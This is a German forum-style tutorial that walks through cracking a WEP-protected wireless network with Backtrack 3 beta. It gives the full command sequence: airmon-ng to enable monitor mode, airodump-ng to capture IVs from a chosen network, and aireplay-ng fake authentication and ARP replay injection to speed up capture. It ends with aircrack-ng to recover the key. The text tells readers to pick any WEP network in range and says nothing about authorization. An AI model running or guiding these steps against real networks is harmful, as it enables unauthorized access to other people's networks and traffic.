Hidden Text sichtbar Ich versuche hier ein kleines Tutorial zu schreiben wie man mit hilfe von Backtrack ein Wep geschütztes Netzwerk crackt. Zuerst benötigen wir das Betriebsystem Backtrack 2 oder 3 beta, ich benutzte 3 beta. Wir booten von der CD und schon können wir loslegen, denn die Programm die wir benötigen sind schon alle vorhanden. Doch die zweite wichtige Sache darf nicht fehlen, eine Linux taugliche Wlan Karte. Ob eure Wlan Karte dafür geeignet ist werdet ihr schon gleich herausfinden. Wir starten in Backtrack die Konsole(Shell) und geben folgendes ein:


bt ~ # iwconfig
Dabei wird folgendes angezeigt:
lo no wireless extensions.

eth0 no wireless extensions.

wlan0 802.11b/g Mode:Managed Channel=6

Access Point: Not-Associated Bit Rate=11 Mb/s Tx-Power=10 dBm Retry:on Fragment thr:off Encryption key:off Link Quality:15/100 Signal level:-233 dBm Noise level:-171 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Wlan0 ist also die Wlan karte und dies müssen wir auch wissen! Und die Mac Adresse von der Wlan karte benötigt ihr auch. Die steht meistens drauf falls nicht kann man Sie mit foglenden Befehl einsehen:


bt ~ # ifconfig
Ein Beispiel wie die Mac Adresse auszusehen hat: 00:AC:BD:FD:01:A1

Wir versetzen die Wlan karte in den Monitor Mode dies geht mit:


bt ~ # airmon-ng start wlan0
Wlan0 ist unsere Wlan Karte. Der Monitor mode muss enabled sein!!! Sonst geht es nicht. Falls dies nicht gehn sollte habt ihr schon verloren, oder ihr kauft euch eine womit es geht! Ich kann euch gerne dabei helfen!

Nun schauen wir uns nach Netzwerken um, dazu geben wir ein:


bt ~ # airodump-ng wlan0

Nun erscheint eine Liste wo alle erreichbaren Netzwerke aufgeführt werden. Wir suchen uns ein Wep geschütztes aus und geben folgenden befehl ein:


bt ~ # airodump-ng -c 11 --bssid 00:12:34:56:78:90 -w output wlan0
So -c und dann der Channel des Netzwerks, ich habe den Channel 11 gewählt.

--Bssid ist die Mac adresse des Netzwerkes und mit -w speichern wir die IV's in die Datei Namens output. Dahinter kommt dann wlan0!

Nun sollten wir das gemacht haben, müssen wir noch Injection durchführen, damit wir schneller IV's (#Data) bekommen. Wir geben ein:


bt ~ # aireplay-ng -1 0 -e (Netzwerkname) -a (Mac Adresse des Netzwerks) -h (Mac Adresse Wlan Karte) wlan0

Ist das getan geben wir dies hier ein:


bt ~ # aireplay-ng -3 -e (Netzwerkname) -a (Mac Adresse des Netzwerks) -h (Mac Adresse Wlan Karte) wlan0

So nun sollte das empfangen der IV's viel schneller gehn... Wir warten bis wir genung IV's zusammen haben am besten wären 50.000.

Nun cracken wir das Passwort mit Aircrack:


bt ~ # aircrack-ng -b (Mac Adresse des Netzwerks) output*.cap

bottom corner